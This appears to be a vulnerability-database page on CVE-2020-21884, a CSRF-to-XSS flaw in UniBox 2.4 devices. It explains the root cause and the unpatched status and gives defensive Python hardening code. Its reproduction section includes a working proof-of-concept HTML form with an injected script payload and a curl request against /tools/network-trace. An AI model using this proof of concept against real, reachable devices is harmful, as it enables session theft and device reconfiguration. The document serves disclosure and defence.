VYPR
Unrated severity · NVD Advisory · Published Apr 9, 2021 · Updated Aug 4, 2024

CVE-2020-21884

Description

Unibox SMB 2.4 and UniBox Enterprise Series 2.4 and UniBox Campus Series 2.4 contain a cross-site request forgery (CSRF) vulnerability in /tools/network-trace, /list_users, /list_byod?usertype=raduser, /dhcp_leases, /go?rid=202 in which a specially crafted HTTP request may reconfigure the device.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products

4

Patches

Vulnerability mechanics

Root cause

"The web interface lacks CSRF token validation and fails to sanitize user input on the /tools/network-trace page, enabling cross-site request forgery combined with stored/reflected XSS."

Attack vector

An attacker crafts a malicious HTML page containing a hidden form that submits a POST request to the victim's UniBox device at /tools/network-trace [ref_id=1]. The form carries a payload in the "filter" parameter that injects JavaScript (e.g., `"><script>alert(document.cookie)</script>`) [ref_id=1]. If the victim is already authenticated to the UniBox web interface (i.e., the browser holds a valid PHPSESSID cookie and attaches it to the cross-site POST), the device reflects the unescaped filter value into its response and the attacker's script runs in the device's origin with the victim's session; the advisory describes this as leading to account takeover [ref_id=1]. The attack is remote and requires no network position beyond the victim opening the crafted page while able to reach the device [ref_id=1].

Affected code

The primary vulnerable endpoint is /tools/network-trace, which accepts a POST request with parameters including "filter" that are not sanitized [ref_id=1]. Additional pages identified as XSS-vulnerable include /authentication/list_users, /authentication/list_byod?usertype=raduser, /reports/dhcp_leases, and /go?rid=202 [ref_id=1]. The advisory does not specify the underlying source files or codebase language beyond noting the web interface runs on UniBox 2.4 firmware [ref_id=1].

What the fix does

No patch or vendor fix has been published; the researcher noted that after disclosure in January 2020 the vendor responded but no further communication was received [ref_id=1][ref_id=2]. The advisory recommends implementing CSRF tokens on all state-changing forms and properly sanitizing user-supplied input on the /tools/network-trace page to prevent XSS [ref_id=1]. Without these countermeasures, the device remains vulnerable to the described CSRF-to-XSS chain.
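The attack vector and the recommended fix above can be shown side by side. The following is an added illustration, not UniBox code (the real handler is PHP and its source is not public): a stdlib-only Python model of a /tools/network-trace handler, first behaving as the advisory describes (no CSRF check, "filter" echoed back raw), then hardened with the two countermeasures the advisory recommends, a per-session CSRF token and output escaping, plus an Origin check and an input allowlist as defence in depth. The session layout, the token scheme, the filter grammar and the placeholder DEVICE_ORIGIN are assumptions; the sample request body is constructed from the advisory's curl PoC.

```python
# Added illustration (not UniBox code): a stdlib-only model of a
# /tools/network-trace handler, as the advisory describes it and then
# hardened. Session layout, token scheme, filter grammar and the
# DEVICE_ORIGIN placeholder are assumptions.
import hmac
import html
import re
import secrets
from urllib.parse import parse_qs, urlsplit

DEVICE_ORIGIN = "http://IP-OF-Device"  # placeholder host from the advisory's PoC

# Constructed sample: the body the advisory's curl PoC posts.
POC_BODY = ("port=lan&duration=600&noofpackets=100&sizelimit=128"
            "&filter=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E"
            "&formsubmit=Start+Trace")

# Assumed allowlist for a tcpdump-style capture filter: no quotes, no
# semicolons, bounded length. Angle brackets stay allowed because BPF
# syntax uses them ("ip[2:2] > 576"), so escaping on output is still needed.
FILTER_RE = re.compile(r"[A-Za-z0-9 ./:()\[\]!&|=<>_-]{0,256}")


def _form(body):
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body).items()}


def vulnerable_handler(session, body):
    """Behaviour the advisory describes: no token, value reflected unescaped."""
    filt = _form(body).get("filter", "")
    return 200, f'<input name="filter" value="{filt}">'


def issue_csrf_token(session):
    """Mint a per-session token; the form page would embed it as a hidden field."""
    session["csrf"] = secrets.token_hex(16)
    return session["csrf"]


def _same_origin(headers):
    """Browsers send Origin on every POST, so an absent header fails closed."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    u = urlsplit(src)
    return f"{u.scheme}://{u.netloc}".lower() == DEVICE_ORIGIN.lower()


def hardened_handler(session, body, headers):
    """Same endpoint with origin check, CSRF token, input allowlist, output escaping."""
    if not _same_origin(headers):
        return 403, "cross-site request rejected"
    form = _form(body)
    expected = session.get("csrf", "")
    supplied = form.get("csrf", "")
    # Constant-time compare on bytes; an unset session token never matches.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, "missing or invalid CSRF token"
    filt = form.get("filter", "")
    if not FILTER_RE.fullmatch(filt):
        return 400, "invalid filter expression"
    # Escape at the point of reflection even though the allowlist passed.
    return 200, f'<input name="filter" value="{html.escape(filt, quote=True)}">'


if __name__ == "__main__":
    print(vulnerable_handler({}, POC_BODY))
    s = {}
    tok = issue_csrf_token(s)
    print(hardened_handler(s, POC_BODY, {}))
    print(hardened_handler(s, POC_BODY + "&csrf=" + tok, {"Origin": DEVICE_ORIGIN}))
    print(hardened_handler(s, "filter=tcp+port+80&csrf=" + tok, {"Origin": DEVICE_ORIGIN}))
```

Running the PoC body through `vulnerable_handler` returns a page with the injected `<script>` intact; through `hardened_handler` it is refused at the Origin check when delivered cross-site, at the token check when the attacker's page cannot supply the session-bound token, and at the allowlist because the payload needs a quote to break out of the attribute. A payload that slips past the allowlist is still neutralised by `html.escape` at the point of reflection, which is why the escaping step is not redundant.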

Preconditions

  • auth: The victim must have an active authenticated session (valid PHPSESSID cookie) on the UniBox web interface, and the browser must attach that cookie to a cross-site POST. Chromium-based browsers treat cookies with no SameSite attribute as Lax (with a two-minute exception for freshly set cookies) and will not send them on a cross-site form POST, so the cross-site delivery depends on the victim's browser and on whether the device sets SameSite=None.
  • network: The attacker must be able to deliver a crafted HTML page to the victim (e.g., via phishing email or malicious website).
  • input: The victim's browser must be able to reach the UniBox device's IP address (network connectivity).

Reproduction

1. Ensure the victim is logged into the UniBox web interface (has a valid PHPSESSID cookie).

2. Host the following HTML page and trick the victim into opening it [ref_id=1]:

```html
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://IP-OF-Device/tools/network-trace" method="POST">
      <input type="hidden" name="port" value="lan" />
      <input type="hidden" name="duration" value="600" />
      <input type="hidden" name="noofpackets" value="100" />
      <input type="hidden" name="sizelimit" value="128" />
      <input type="hidden" name="filter" value='"/><script>alert(document.cookie)</script>' />
      <input type="hidden" name="formsubmit" value="Start Trace" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

3. Alternatively, use the provided curl command, which exercises the reflected XSS directly with a valid session cookie rather than the cross-site delivery [ref_id=1]:

```bash
curl -i -s -k -X $'POST' \
  -H $'Host: IP-OF-Device' \
  -H $'Cookie: PHPSESSID=86i9fsqxxxxxxxxxxxxxx' \
  --data-binary $'port=lan&duration=600&noofpackets=100&sizelimit=128&filter=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&formsubmit=Start+Trace' \
  $'http://ip-of-device/tools/network-trace'
```

Generated on May 31, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

3

News mentions

0

No linked articles in our index yet.